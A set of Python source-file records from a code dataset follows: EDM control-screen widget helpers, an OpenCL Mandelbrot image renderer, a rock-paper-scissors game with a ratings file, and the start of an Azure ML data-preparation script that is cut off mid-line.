'rectangle', 'symbol',\\\n 'text_monitor', 'tooltip', 'shell', 'shell_visible', 'can_optimise']\n__all__.sort()\n\ndef can_optimise(x):\n \"\"\"can_optimise(x) -> Boolean\n Return True if the item can be optimised (i.e. if it is an autogen screen\n or one of the selected optimisable screens\"\"\"\n return (\"camera\" in x and not \"2cam\" in x and not \"camera\"==x) or \"autogen\"\\\n in x or \"slit\" in x or \"mirror\" in x \n \ndef label(x,y,w,h,text,fontAlign=\"left\"):\n \"\"\"label(x,y,w,h,text,fontAlign=\"left\") -> EdmObject\n Return a Static Text box with position (x,y) dimensions (w,h). text is the\n display text and fontAlign is how it is aligned. Font is arial medium 10\"\"\"\n ob = EdmObject(\"Static Text\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"font\"]=quoteString(\"arial-medium-r-10.0\")\n ob[\"fgColor\"]=ob.Colour[\"Black\"]\n ob[\"useDisplayBg\"] = True\n ob[\"value\"] = quoteListString(text) \n ob[\"fontAlign\"] = quoteString(fontAlign) \n return ob\n\ndef text_monitor(x,y,w,h,pv,showUnits=False,fontAlign=\"left\"):\n \"\"\"text_monitor(x,y,w,h,pv,showUnits=False,fontAlign=\"left\") -> EdmObject\n Return a Text Monitor with position (x,y) dimensions (w,h). pv is the\n display pv and fontAlign is how it is aligned. Font is arial medium 10.\n If showUnits, then units from the Db are shown.\"\"\" \n ob = EdmObject(\"Text Monitor\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"controlPv\"]=quoteString(pv)\n ob[\"font\"] = quoteString(\"arial-medium-r-10.0\")\n ob[\"fgColor\"] = ob.Colour[\"Black\"]\n ob[\"useDisplayBg\"] = True\n ob[\"precision\"] = 3\n ob[\"fontAlign\"] = quoteString(fontAlign) \n ob[\"smartRefresh\"] = True\n ob[\"fastUpdate\"] = True\n ob[\"showUnits\"] = showUnits\n ob[\"limitsFromDb\"] = False\n ob[\"newPos\"] = True\n return ob\n\ndef dummy(x,y,w,h):\n \"\"\"dummy(x,y,w,h) -> EdmObject\n Return a dummy invisible rectangle with position (x,y) dimensions (w,h)\"\"\"\n ob = EdmObject(\"Rectangle\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"lineColor\"] = ob.Colour[\"Canvas\"]\n ob[\"invisible\"] = True\n return ob\n\ndef rectangle(x,y,w,h,lineColour=\"Black\",fillColour=\"Controller\"):\n \"\"\"rectangle(x,y,w,h,lineColour=\"Black\",fillColour=\"Controller\")\\\n -> EdmObject\n Return a filled rectangle with position (x,y) dimensions (w,h). fillColour\n and lineColour are looked up in ob.Colour\"\"\"\n ob = EdmObject(\"Rectangle\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"lineColor\"] = ob.Colour[lineColour]\n ob[\"fill\"] = True\n ob[\"fillColor\"] = ob.Colour[fillColour]\n return ob\n\ndef tooltip(x,y,w,h,text):\n \"\"\"tooltip(x,y,w,h,text) -> EdmObject\n Return an invisible related display with position (x,y) dimensions (w,h).\n When right clicked, it displays a tooltip with the given text.\"\"\" \n ob = EdmObject(\"Related Display\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"yPosOffset\"] = max(h,22)+8\n ob[\"xPosOffset\"] = w/2-100\n ob[\"button3Popup\"] = True\n ob[\"invisible\"] = True\n ob[\"buttonLabel\"] = quoteString(\"tooltip\")\n ob[\"numPvs\"] = 4\n ob[\"numDsps\"] = 1\n ob[\"displayFileName\"] = { 0: quoteString(\"symbols-tooltip-symbol\") }\n ob[\"setPosition\"] = { 0: quoteString(\"button\") }\n ob[\"symbols\"] = { 0: quoteString(\"text=\"+text) }\n return ob\n\ndef rd(x,y,w,h,filename,symbols):\n \"\"\"rd(x,y,w,h,filename,symbols) -> EdmObject\n Return an invisible related display with position (x,y) dimensions (w,h).\n filename and symbols as defined.\"\"\" \n ob = EdmObject(\"Related Display\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"invisible\"] = True\n ob[\"buttonLabel\"] = quoteString(\"device screen\")\n ob[\"numPvs\"] = 4\n if filename:\n ob[\"displayFileName\"] = { 0: quoteString(filename) }\n ob[\"numDsps\"] = 1 \n if symbols:\n ob[\"symbols\"] = { 0: quoteString(symbols) }\n else:\n ob[\"numDsps\"] = 0 \n return ob\n\ndef shell(x,y,w,h,command):\n \"\"\"shell(x,y,w,h,filename,symbols) -> EdmObject\n Return an invisible shell command button with position (x,y) dimensions\n (w,h) and command as defined.\"\"\" \n ob = EdmObject(\"Shell Command\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"invisible\"] = True\n ob[\"buttonLabel\"] = quoteString(\"Shell Command\")\n ob[\"numCmds\"] = 1\n ob[\"command\"] = { 0: quoteString(command) }\n return ob\n\ndef shell_visible(x,y,w,h,name,command):\n \"\"\"shell(x,y,w,h,filename,symbols) -> EdmObject\n Return an invisible shell command button with position (x,y) dimensions\n (w,h) and command as defined.\"\"\" \n ob = EdmObject(\"Shell Command\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"buttonLabel\"] = quoteString(name)\n ob[\"numCmds\"] = 1\n ob[\"command\"] = { 0: quoteString(command) }\n ob[\"fgColor\"] = ob.Colour[\"Related display\"]\n ob[\"bgColor\"] = ob.Colour[\"Canvas\"]\n ob[\"font\"] = quoteString(\"arial-bold-r-14.0\") \n ob.setShadows()\n return ob\n\ndef rd_visible(x,y,w,h,text,filename,symbols=None):\n \"\"\"rd_visible(x,y,w,h,text,filename,symbols=None) -> EdmObject\n Return a visible related display button with position (x,y) dimensions (w,h)\n text is the button label and filename and symbols are as defined.\"\"\" \n ob = EdmObject(\"Related Display\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"buttonLabel\"] = quoteString(text)\n ob[\"numPvs\"] = 4\n ob[\"numDsps\"] = 1\n ob[\"displayFileName\"] = { 0: quoteString(filename) }\n if symbols:\n ob[\"symbols\"] = { 0: quoteString(symbols) }\n ob[\"fgColor\"] = ob.Colour[\"Related display\"]\n ob[\"bgColor\"] = ob.Colour[\"Canvas\"]\n ob[\"font\"] = quoteString(\"arial-bold-r-14.0\") \n ob.setShadows() \n return ob\n\ndef symbol(x,y,w,h,filename,pv,nstates,truth=False):\n \"\"\"symbol(x,y,w,h,filename,pv,nstates,truth=False) -> EdmObject\n Return a symbol with position (x,y) dimensions (w,h). for i in nstates:\n connect values i-1 to i to symbol state i. If truth, treat it as a truth\n table.\"\"\"\n ob = EdmObject(\"Symbol\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"file\"] = quoteString(filename)\n ob[\"truthTable\"] = truth\n ob[\"numStates\"] = nstates\n mindict,maxdict = {},{}\n for i in range(1,nstates):\n if i>1:\n mindict[i] = i-1\n maxdict[i]=i\n ob[\"minValues\"] = mindict\n ob[\"maxValues\"] = maxdict\n ob[\"controlPvs\"] = { 0: quoteString(pv) }\n ob[\"numPvs\"] = 1\n ob[\"useOriginalColors\"] = True\n return ob\n\ndef raised_circle(x,y,w,h,ta=\"CO\"):\n \"\"\"raised_circle(x,y,w,h,ta=\"CO\") -> EdmObject\n Return a 3d look circle with position (x,y) dimensions (w,h). ta gives\n the colour, ie CO, MO, DI, VA, etc.\"\"\"\n group = EdmObject(\"Group\")\n top_shadow = EdmObject(\"Circle\")\n top_shadow.setDimensions(w-2,h-1)\n top_shadow.setPosition(x,y)\n top_shadow[\"lineColor\"]=top_shadow.Colour[\"Top Shadow\"]\n top_shadow[\"lineWidth\"]=2\n group.addObject(top_shadow)\n bottom_shadow = EdmObject(\"Circle\")\n bottom_shadow.setDimensions(w-2,h-1)\n bottom_shadow.setPosition(x+2,y+2)\n bottom_shadow[\"lineColor\"]=bottom_shadow.Colour[\"Bottom Shadow\"]\n bottom_shadow[\"lineWidth\"]=2\n group.addObject(bottom_shadow)\n base = EdmObject(\"Circle\")\n base.setDimensions(w-3,h-3)\n base.setPosition(x+2,y+2)\n base[\"lineColor\"]=base.Colour[ta+\" help\"]\n base[\"fillColor\"]=base.Colour[ta+\" title\"]\n base[\"lineWidth\"]=3\n base[\"fill\"]=True\n group.addObject(base)\n sparkle = EdmObject(\"Circle\")\n sparkle.setDimensions(4,3)\n sparkle.setPosition(x+12,y+6)\n sparkle[\"lineColor\"]=sparkle.Colour[\"Top Shadow\"]\n sparkle[\"fillColor\"]=sparkle.Colour[\"White\"]\n sparkle[\"lineWidth\"]=2\n sparkle[\"fill\"]=True\n group.addObject(sparkle)\n group.setPosition(x,y,move_objects=False)\n group.setDimensions(w,h,resize_objects=False)\n return group\n\ndef raised_text_circle(x,y,w,h,text,font=\"arial-bold-r-14.0\",\\\n fontAlign=\"center\",ta=\"CO\"):\n \"\"\"raised_text_circle(x,y,w,h,text,font=\"arial-bold-r-14.0\",\\\n fontAlign=\"center\",ta=\"CO\") -> EdmObject\n Return a 3d look circle with a text label text, position (x,y) dimensions\n (w,h), font and fontAlign. ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n group = raised_circle(x,y,w,h,ta)\n text_label = label(x,y,w,h,text)\n text_label[\"fontAlign\"]=quoteString(fontAlign)\n text_label[\"font\"]=quoteString(font)\n group.addObject(text_label)\n return group\n\ndef raised_button_circle(x,y,w,h,filename,symbols,ta=\"CO\"):\n \"\"\"raised_button_circle(x,y,w,h,filename,symbols,ta=\"CO\") -> EdmObject\n Return a 3d look circular button with position (x,y) dimensions (w,h)\n filename and symbols. ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n group = raised_circle(x,y,w,h,ta)\n RD = rd(4,4,42,24,filename,symbols)\n group.addObject(RD)\n RD.lowerObject()\n return group\n\ndef raised_text_button_circle(x,y,w,h,text,filename,symbols,\\\n font=\"arial-bold-r-14.0\",fontAlign=\"center\",ta=\"CO\"):\n \"\"\"raised_text_button_circle(x,y,w,h,text,filename,symbols,\\\n font=\"arial-bold-r-14.0\",fontAlign=\"center\",ta=\"CO\") -> EdmObject\n Return a 3d look circular button with a text label text, position (x,y)\n dimensions (w,h) filename and symbols. ta gives the colour, ie CO, MO, DI,\n VA, etc.\"\"\"\n group = raised_button_circle(x,y,w,h,filename,symbols,ta)\n text_label = label(x,y,w,h,text)\n text_label[\"fontAlign\"]=quoteString(fontAlign)\n text_label[\"font\"]=quoteString(font)\n group.addObject(text_label)\n return group\n\ndef raised_PV_circle(x,y,w,h,pv,ta=\"CO\"):\n \"\"\"raised_PV_circle(x,y,w,h,pv,ta=\"CO\") -> EdmObject\n Return a 3d look circle with a PV monitor pv, position (x,y) dimensions\n (w,h). ta gives the colour, ie CO, MO, DI, VA, etc.\"\"\"\n group = raised_circle(x,y,w,h,ta)\n PV = text_monitor(x,y,w,h,pv)\n PV[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n PV[\"fontAlign\"]=quoteString(\"center\")\n group.addObject(PV)\n return group \n\ndef raised_PV_button_circle(x,y,w,h,pv,filename=\"generic-help\",\\\n symbols=\"draw=$(P).png\",ta=\"CO\"):\n \"\"\"raised_PV_button_circle(x,y,w,h,pv,filename=\"generic-help\",\\\n symbols=\"draw=$(P).png\",ta=\"CO\") -> EdmObject\n Return a 3d look circular button with a a PV monitor pv, position (x,y)\n dimensions (w,h) filename and symbols. ta gives the colour, ie CO, MO, DI,\n VA, etc.\"\"\"\n group = raised_PV_circle(x,y,w,h,pv,ta)\n RD = rd(x+4,y+4,w-8,h-6,filename,symbols)\n group.addObject(RD)\n RD.lowerObject()\n return group\n\ndef raised_PV_shell_circle(x,y,w,h,pv,\\\n command=\"firefox $(autogen)/documentation/$(P)-help.html\",ta=\"CO\"):\n \"\"\"raised_PV_button_circle(x,y,w,h,pv,filename=\"generic-help\",\\\n symbols=\"draw=$(P).png\",ta=\"CO\") -> EdmObject\n Return a 3d look circular button with a a PV monitor pv, position (x,y)\n dimensions (w,h) filename and symbols. ta gives the colour, ie CO, MO, DI,\n VA, etc.\"\"\"\n group = raised_PV_circle(x,y,w,h,pv,ta)\n RD = shell(x+4,y+4,w-8,h-6,command)\n group.addObject(RD)\n RD.lowerObject()\n return group\n\ndef embed(x,y,w,h,filename,symbols=None):\n \"\"\"embed(x,y,w,h,filename,symbols=None) -> EdmObject\n Return an embedded window with position (x,y) dimensions (w,h) filename\n and symbols.\"\"\"\n ob = EdmObject(\"Embedded Window\")\n ob.setPosition(x,y)\n ob.setDimensions(w,h)\n ob[\"displaySource\"]=quoteString(\"menu\")\n ob[\"filePv\"]=quoteString(r\"LOC\\dummy=i:0\")\n ob[\"numDsps\"]=1\n ob[\"displayFileName\"]= { 0: quoteString(filename) }\n if symbols:\n ob[\"symbols\"]= { 0: quoteString(symbols) }\n ob[\"noScroll\"]= True \n return ob\n\ndef exit_button(x,y,w,h):\n \"\"\"exit_button(x,y,w,h) -> EdmObject\n Return an exit button with position (x,y) dimensions (w,h).\"\"\"\n button = EdmObject(\"Exit Button\")\n button.setPosition(x,y)\n button.setDimensions(w,h)\n button[\"fgColor\"] = button.Colour[\"Exit/Quit/Kill\"]\n button[\"bgColor\"] = button.Colour[\"Canvas\"]\n button.setShadows()\n button[\"label\"] = quoteString(\"EXIT\")\n button[\"font\"] = quoteString(\"arial-medium-r-16.0\")\n button[\"3d\"] = True\n return button\n\ndef lines(points,col=\"Black\"):\n ob = EdmObject(\"Lines\")\n ob[\"lineColor\"] = ob.Colour[col]\n ob[\"numPoints\"] = len(points)\n ob[\"xPoints\"] = dict((i,x) for i,(x,y) in enumerate(points) )\n ob[\"yPoints\"] = dict((i,y) for i,(x,y) in enumerate(points) ) \n ob.autofitDimensions()\n return ob \n\ndef arrow(x0,x1,y0,y1,col=\"Black\"):\n \"\"\"arrow(x0,x1,y0,y1,col=\"Black\") -> EdmObject\n Return an arrow from (x0,y0) to (x1,y1) with colour col.\"\"\"\n ob = lines([(x0,y0),(x1,y1)],col)\n ob[\"arrows\"] = quoteString(\"to\")\n return ob\n\ndef component_symbol(x,y,w,h,StatusPv,SevrPv,filename):\n if not SevrPv.startswith(\"LOC\") and not SevrPv.startswith(\"CALC\"):\n SevrPv = SevrPv.split(\".\")[0]+\".SEVR\" \n ob = EdmObject(\"Symbol\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"file\"] = quoteString(filename)\n ob[\"numStates\"] = 5\n ob[\"minValues\"] = {0:6, 1:0, 2:2, 3:4, 4:1}\n ob[\"maxValues\"] = {0:8, 1:1, 2:4, 3:6, 4:2}\n ob[\"controlPvs\"] = {0: quoteString(StatusPv), 1: quoteString(SevrPv)}\n ob[\"numPvs\"] = 2\n ob[\"shiftCount\"] = {1:1}\n ob[\"useOriginalColors\"] = True\n return ob \n\ndef colour_changing_rd(x,y,w,h,name,StatusPv,SevrPv,filename,symbols=\"\",edl=True):\n \"\"\"Return a symbol with an invisible rd behind it that changes col based on\n sta and sevr pvs\"\"\"\n obgroup = EdmObject(\"Group\")\n if edl:\n obgroup.addObject(rd_visible(x,y,w,h,\"\",filename,symbols))\n else: \n obgroup.addObject(shell_visible(x,y,w,h,\"\",filename)) \n obtext = label(x+2,y+2,w-4,h-4,name,fontAlign=\"center\")\n obtext[\"font\"] = quoteString(\"arial-bold-r-14.0\")\n obtext[\"fgColor\"] = obtext.Colour[\"Related display\"] \n obtext[\"bgAlarm\"] = True\n obtext[\"alarmPv\"] = quoteString(SevrPv)\n obtext[\"visPv\"] = quoteString(StatusPv)\n obtext[\"visMin\"] = quoteString(\"1\")\n obtext[\"visMax\"] = quoteString(\"2\") \n obtext[\"useDisplayBg\"] = False\n obtext2 = obtext.copy() \n obtext[\"visInvert\"] = True \n obtext2[\"bgColor\"] = obtext.Colour[\"Monitor: NORMAL\"] \n obgroup.addObject(obtext) \n obgroup.addObject(obtext2)\n obgroup.autofitDimensions()\n return obgroup\n\n\ndef flip_axis(direction):\n # create a set of axis for a beam going left or right\n group = EdmObject(\"Group\")\n if direction==\"left\":\n zlab=label(50,50,10,20,\"Z\",\"center\")\n zlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(zlab)\n z=arrow(5,45,60,60,\"grey-13\")\n group.addObject(z)\n y=arrow(5,5,60,20,\"grey-13\")\n group.addObject(y) \n ylab=label(0,0,10,16,\"Y\",\"center\")\n ylab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(ylab)\n xlab=label(40,20,77,32,\"X (into \\n screen)\",\"center\")\n xlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(xlab)\n x=arrow(5,35,60,45,\"Black\")\n group.addObject(x)\n else:\n zlab=label(5,25,10,15,\"Z\",\"center\")\n zlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(zlab)\n z=arrow(40,0,45,45,\"Black\")\n group.addObject(z)\n y=arrow(40,40,45,5,\"Black\")\n group.addObject(y) \n ylab=label(15,0,20,20,\"Y\",\"center\")\n ylab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(ylab)\n xlab=label(50,30,69,32,\"X (out of \\n screen)\",\"center\")\n xlab[\"font\"]=quoteString(\"arial-bold-r-14.0\")\n group.addObject(xlab)\n x=arrow(40,70,45,65,\"grey-13\")\n group.addObject(x)\n group.autofitDimensions()\n return group \n","sub_path":"dls_edm/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":16264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"184574565","text":"import time\nimport cv2\nimport numpy as np\nimport pyopencl as cl\nfrom scipy import ndimage\nimport skimage.transform\nimport datetime\n\ndef calc_fractal_numpy(chunks, maxiter):\n output_chunks = []\n\n for chunk_input in chunks:\n chunk_output = np.zeros(chunk_input.shape, dtype=np.uint16)\n\n z = np.zeros(chunk_input.shape, np.complex)\n\n for it in range(maxiter):\n z = z*z + chunk_input\n done = np.greater(abs(z), 2.0)\n chunk_input = np.where(done, 0+0j, chunk_input)\n z = np.where(done, 0+0j, z)\n chunk_output = np.where(done, it, chunk_output)\n\n output_chunks.append(chunk_output)\n\n return np.concatenate(output_chunks)\n\ndef calc_fractal_opencl(chunks, maxiter):\n # List all the stuff in this computer\n platforms = cl.get_platforms()\n\n for platform in platforms:\n print(\"Found a device: {}\".format(str(platform)))\n\n # Let's just go with platform zero\n ctx = cl.Context(dev_type=cl.device_type.ALL,\n properties=[(cl.context_properties.PLATFORM, platforms[0])])\n\n # Create a command queue on the platform (device = None means OpenCL picks a device for us)\n queue = cl.CommandQueue(ctx, device = None)\n\n mf = cl.mem_flags\n\n # This is our OpenCL kernel. It does a single point (OpenCL is responsible for mapping it across the points in a chunk)\n prg = cl.Program(ctx, \"\"\"\n #pragma OPENCL EXTENSION cl_khr_byte_addressable_store : enable\n __kernel void mandelbrot(__global float2 *q, __global ushort *output, ushort const maxiter)\n {\n int gid = get_global_id(0);\n\n float cx = q[gid].x;\n float cy = q[gid].y;\n\n float x = 0.0f;\n float y = 0.0f;\n ushort its = 0;\n\n while (((x*x + y*y) < 4.0f) && (its < maxiter)) {\n float xtemp = x*x - y*y + cx;\n y = 2*x*y + cy;\n x = xtemp;\n its++;\n }\n\n if (its == maxiter) {\n output[gid] = 0;\n } else {\n output[gid] = its;\n }\n }\n \"\"\").build()\n\n output_chunks = []\n output_chunks_on_device = []\n\n chunk_shape = None\n\n for chunk_input in chunks:\n # Record the shape of input chunks\n chunk_shape = chunk_input.shape\n\n # These are our buffers to hold data on the device\n chunk_input_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=chunk_input)\n\n chunk_output_on_device = cl.Buffer(ctx, mf.WRITE_ONLY, int(chunk_input.nbytes / 4))\n # divided by 4 because our inputs are 64 bits but outputs are 16 bits\n\n # Call the kernel on this chunk\n prg.mandelbrot(queue, chunk_shape, None, chunk_input_on_device, chunk_output_on_device, np.uint16(maxiter))\n\n # Add the output chunk to our list to keep track of it\n output_chunks_on_device.append(chunk_output_on_device)\n\n # Wait for all the chunks to be computed\n queue.finish()\n\n for chunk_output_on_device in output_chunks_on_device:\n chunk_output = np.zeros(chunk_shape, dtype=np.uint16)\n\n # Wait until it is done and pull the data back\n cl.enqueue_copy(queue, chunk_output, chunk_output_on_device).wait()\n\n # Insert the chunk in our overall output\n output_chunks.append(chunk_output)\n\n return np.concatenate(output_chunks)\n\ndef apply_blur_opencl(image, radius, strength) :\n platforms = cl.get_platforms()\n\n ctx = cl.Context(dev_type=cl.device_type.ALL,\n properties=[(cl.context_properties.PLATFORM, platforms[0])])\n\n queue = cl.CommandQueue(ctx, device = None)\n mf = cl.mem_flags\n\n image_dims = image.shape\n\n filt = np.ones((radius, radius), dtype=np.float)\n\n preamble = \"\"\"\n #define IMAGE_W {}\n #define IMAGE_H {}\n #define FILTER_SIZE {}\n #define HALF_FILTER_SIZE {}\n #define STRENGTH {}\n \"\"\".format(image_dims[0], image_dims[1], int(radius), int(radius/2), int(strength))\n\n prg = cl.Program(ctx, preamble +\n \"\"\"\n #pragma OPENCL EXTENSION cl_khr_byte_addressable_store : enable\n __kernel void convolve(const __global float *input,\n __global float *output,\n __constant float *filter) {\n\n int y = get_global_id(1);\n int x = get_global_id(0);\n\n if ( y > HALF_FILTER_SIZE && y < ((IMAGE_H - HALF_FILTER_SIZE) - 1) &&\n x > HALF_FILTER_SIZE && x < ((IMAGE_W - HALF_FILTER_SIZE) - 1)) {\n float sum = 0.0f;\n\n for (int ky = 0; ky < FILTER_SIZE; ky++) {\n for (int kx = 0; kx < FILTER_SIZE; kx++) {\n sum += input[(y * IMAGE_W) + (ky-HALF_FILTER_SIZE) + x + (kx-HALF_FILTER_SIZE)] *\n filter[ky * FILTER_SIZE + kx];\n }\n }\n\n output[y * IMAGE_W + x] = sum / (float)STRENGTH;\n } else {\n output[y * IMAGE_W + x] = 0.0f;\n }\n }\n \"\"\").build()\n\n image_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=image)\n filter_on_device = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=filt)\n output_on_device = cl.Buffer(ctx, mf.WRITE_ONLY, image.nbytes)\n output = np.zeros(image_dims, dtype=np.float)\n\n prg.convolve(queue, image_dims, None, image_on_device, output_on_device, filter_on_device)\n\n cl.enqueue_copy(queue, output, output_on_device).wait()\n\n return output\n\n\nif __name__ == '__main__':\n\n class Mandelbrot(object):\n \n def __init__(self):\n self.zoom = 1024\n self.centre_x = -(1.6*self.zoom)\n self.centre_y = 0\n self.w = 1920*4*2\n self.h = 1080*4*2\n self.w_range = 192*4\n self.h_range = 108*4\n self.iterations = 64\n self.chunks = 20\n self.fname = \"mandelbrot.jpg\"\n\n self.beautify = True\n # To get crisper edges, also throw out points with less than this number of iterations\n self.cutoff = 0.125 * self.iterations\n\n self.r_spread = 0.4\n self.g_spread = 0.4\n self.b_spread = 0.4\n\n self.render((self.centre_x-self.w_range)/self.zoom, (self.centre_x+self.w_range)/self.zoom,\n (self.centre_y-self.h_range)/self.zoom, (self.centre_y+self.h_range)/self.zoom, self.iterations)\n self.save_image()\n\n def render(self, x1, x2, y1, y2, maxiter):\n # Create the input\n xx = np.arange(x1, x2, (x2-x1)/self.w)\n yy = np.arange(y2, y1, (y1-y2)/self.h) * 1j\n q = np.ravel(xx+yy[:, np.newaxis]).astype(np.complex64)\n\n # Slice the input up into chunks to be processed in parallel\n chunk_width = self.w\n chunk_height = self.h / self.chunks\n chunked_data = np.split(q, self.chunks)\n\n # Set up the output\n output = np.zeros_like(q)\n chunked_output = np.split(output, self.chunks)\n\n start_main = time.time()\n\n output = calc_fractal_opencl(chunked_data, maxiter)\n\n end_main = time.time()\n\n secs = end_main - start_main\n print(\"Main took\", secs)\n\n self.mandel = output.reshape((self.h, self.w))\n\n def save_image(self):\n normalized = self.mandel.astype(np.double)\n normalized = (normalized / (normalized.max())) * 255.0\n normalized = np.clip(normalized - self.cutoff, 0, 255)\n\n b = normalized\n g = normalized\n r = normalized\n\n if (self.beautify):\n filtered = normalized\n b_filtered = ndimage.uniform_filter(filtered, size=int(11*self.b_spread))\n g_filtered = ndimage.uniform_filter(filtered, size=int(11*self.g_spread))\n r_filtered = ndimage.uniform_filter(filtered, size=int(11*self.r_spread))\n\n b_filtered_mean = b_filtered.mean()\n g_filtered_mean = g_filtered.mean()\n r_filtered_mean = r_filtered.mean()\n\n b = ((b_filtered / b_filtered_mean))\n g = ((g_filtered / g_filtered_mean))\n r = ((r_filtered / r_filtered_mean))\n\n # Renormalize\n b = (b / b.max()) * (255.0)\n g = (g / g.max()) * (255.0)\n r = (r / r.max()) * (255.0)\n\n cv2.imwrite(self.fname, cv2.merge((np.rint(b).astype(np.uint8),\n np.rint(g).astype(np.uint8),\n np.rint(r).astype(np.uint8))))\n\n # test the class\n test = Mandelbrot()\n print(cl.get_platforms())\n\n","sub_path":"Sem 1/Scalable Computing/Scalable Computing OpenCL Project - Mandlebrot creation in complex space/open_cl.py","file_name":"open_cl.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"45748306","text":"# Write your code here\nimport random\n\ndefeats = {'rock': ['paper'], 'paper': ['scissors'], 'scissors': ['rock']}\n\ndef findWinner(user,computer):\n\n if user == computer:\n return 0\n\n if user in defeats[computer]:\n return 1\n\n else:\n return -1\n\ndef get_rating(name):\n #name = name.upper()\n\n rating_file = open('rating.txt')\n data = rating_file.read()\n rating_file.close()\n\n if name in data:\n player_data = [player for player in data.split('\\n') if name in player]\n rating = int(player_data[0].split()[1])\n\n else:\n rating = 0\n\n return rating\n\ndef write_data(name,new_rating,old_rating):\n #name = name.upper()\n new_data = name + \" \" + str(new_rating)\n old_data = name + \" \" + str(old_rating)\n\n rating_file = open('rating.txt', 'r')\n data = rating_file.read()\n rating_file.close()\n\n update_file = open('rating.txt','w')\n\n if name in data:\n data = data.replace(old_data,new_data)\n else:\n data += new_data\n\n print(data, end='\\n', file=update_file)\n\n update_file.close()\n\n\ndef set_precedence(options):\n global defeats\n defeats = {}\n\n for option in options:\n i = options.index(option)\n part1 = options[:i]\n others = options[i+1:]\n others.extend(part1)\n defeats[option] = others[:len(others)//2]\n\n print(defeats)\n\nname = input('Enter your name:')\nprint(\"Hello,\",name)\n\nrating = get_rating(name)\nold_rating = rating\n\noptions = input().split(',')\n\nif '' not in options:\n set_precedence(options)\nelse:\n options = ['rock','paper','scissors']\n\nprint(\"Okay, let's start\")\n\nvalid_input = options + ['!exit','!rating']\n\nwhile True:\n\n user = input()\n computer = random.choice(options)\n\n if user not in valid_input:\n print('Invalid input')\n continue\n\n if user == '!exit':\n print('Bye!')\n write_data(name,rating,old_rating)\n break\n\n if user == '!rating':\n print(\"Your rating:\",rating)\n continue\n\n outcome = findWinner(user,computer)\n\n if outcome == 0:\n print(f'There is a draw ({user})')\n rating += 50\n\n elif outcome == 1:\n print(f'Well done. The computer chose {computer} and failed')\n rating += 100\n\n else:\n print(f'Sorry, but the computer chose {computer}')","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"253477836","text":"import argparse\nimport json\nimport os\nimport sys\nimport traceback\nfrom glob import glob\nimport math\n\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom azureml.core import Dataset, Datastore, Experiment, Run, Workspace\nfrom azureml.core.authentication import AzureCliAuthentication\nfrom dotenv import load_dotenv\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\n# For local development, set values in this section\nload_dotenv()\n\ndef main():\n cli_auth = AzureCliAuthentication()\n\n workspace_name = os.environ.get(\"WORKSPACE_NAME\")\n resource_group = os.environ.get(\"RESOURCE_GROUP\")\n subscription_id = os.environ.get(\"SUBSCRIPTION_ID\")\n\n input_dataset_name = os.environ.get(\"INPUT_DATASET_NAME\")\n training_testing_dataset_name = os.environ.get(\"TRAINING_TESTING_DATASET\")\n generator_dataset_name = os.environ.get(\"GENERATOR_DATASET_NAME\")\n\n script_folder = os.path.join(os.environ.get('ROOT_DIR'), 'scripts')\n config_state_folder = os.path.join(os.environ.get('ROOT_DIR'), 'config_states')\n\n train_test_data_folder = os.path.join(os.environ.get('ROOT_DIR'), 'data/tmp/train_test_data')\n os.makedirs(train_test_data_folder, exist_ok=True)\n\n generator_folder = os.path.join(os.environ.get('ROOT_DIR'), 'data/tmp/generator')\n os.makedirs(generator_folder, exist_ok=True)\n\n ws = Workspace.get(\n name=workspace_name,\n subscription_id=subscription_id,\n resource_group=resource_group,\n auth=cli_auth\n )\n\n datastore = Datastore(ws)\n\n # Prepare!\n all_labels_np, all_components_np, all_sizes_np, components = loadInputData(input_dataset_name, ws)\n\n X_train_conv, X_train_values, X_test_conv, X_test_values, y_train, y_test = trainTestSplit(all_labels_np, all_components_np, all_sizes_np)\n\n saveNumpyArrays(train_test_data_folder, X_train_conv=X_train_conv, X_train_values=X_train_values, X_test_conv=X_test_conv, X_test_values=X_test_values, y_train=y_train, y_test=y_test)\n\n generateData(datastore, ws, generator_dataset_name, generator_folder, components, X_train_conv, X_train_values, y_train)\n\n y_train_generated, X_train_values_generated, X_train_conv_generated = processGeneratedData(generator_folder)\n\n saveNumpyArrays(train_test_data_folder, y_train_generated=y_train_generated, X_train_values_generated=X_train_values_generated, X_train_conv_generated=X_train_conv_generated)\n saveNumpyArrays(train_test_data_folder, component_names=np.asarray(components))\n\n datastore.upload(src_dir=train_test_data_folder, target_path='train_test_data')\n train_test_data = Dataset.File.from_files(\n [\n (datastore, 